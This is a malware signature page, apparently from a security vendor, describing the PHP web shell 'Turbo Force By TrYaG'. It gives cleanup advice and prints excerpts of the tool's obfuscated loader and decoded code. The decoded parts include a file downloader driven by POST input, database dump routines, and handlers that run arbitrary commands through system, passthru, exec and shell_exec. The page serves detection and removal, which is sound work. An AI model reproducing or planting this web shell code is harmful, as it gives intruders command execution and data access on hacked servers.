Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.tryag_cpanelcracker.002

php.hacktool.tryag_cpanelcracker.002

Turbo Force By TrYaG is a sophisticated tools that provides interface to several types of databases: MySql, MS SQL, PostgreSQL and Oracle. It also allowas hackers to execute arbitrary commands on hacked servers.

Affecting

Any servers with enabled PHP

Cleanup

Delete the malicious script and scan your server for other types of malware and specifically for backdoors.
You can also sign up with us and let our team remove the malware for you.

Dump

... excerpt from the ecrypted script ...

<?php /* Turbo Force By TrYaG.CC - TrYaG AcaDemY */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10} ...

... excerpts from the decoded script ....

function dump($table)
{
if (empty($table)) return 0;
$this->dump = array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: ' . date("d/m/Y H:i:s");
$this->dump[3] = '## Database: ' . $this->base;
$this->dump[4] = '## Table: ' . $table;
$this->dump[5] = '## --------------------------------------- ';
switch ($this->db) {

...

function close()
{
switch ($this->db) {
case 'MySQL':
@mysql_close($this->connection);
break;

case 'MSSQL':
@mssql_close($this->connection);
break;

case 'PostgreSQL':
@pg_close($this->connection);
break;

case 'Oracle':
@oci_close($this->connection);
break;
}
}

...

if (!empty($_POST['cccc']) && $_POST['cccc'] == "download_file" && !empty($_POST['d_name'])) {
if (!$file = @fopen($_POST['d_name'], "r")) {
err(1, $_POST['d_name']);
$_POST['cccc'] = "";
}

...

if (!empty($_POST['cccc']) && $_POST['cccc'] == "db_query") {
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';', $_POST['db_query']);

...

if ($_POST[att] == 'system') {
echo '
<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
system($_POST['ccmmdd2']);
echo '</textarea>';
}

if ($_POST[att] == 'passthru') {
echo '
<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
passthru($_POST['ccmmdd2']);
echo '</textarea>';
}

if ($_POST[att] == 'exec') {
echo '<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
exec($_POST['ccmmdd2'], $res);
echo $res = join("n", $res);
echo '</textarea>';
}

if ($_POST[att] == 'shell_exec') {
echo '<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
echo shell_exec($_POST['ccmmdd2']);
echo '</textarea>';
}

...

echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By Tryag Script Name</b>";
echo "<center><b><a href=" . $_SERVER['PHP_SELF'] . ">BACK</a>";
exit;

...

if ('' == ($func = @ini_get('disable_functions'))) {
echo "<font color=#00800F>No Security for Function</font></b>";
}
else {
echo "<font color=red>$func</font></b>";

...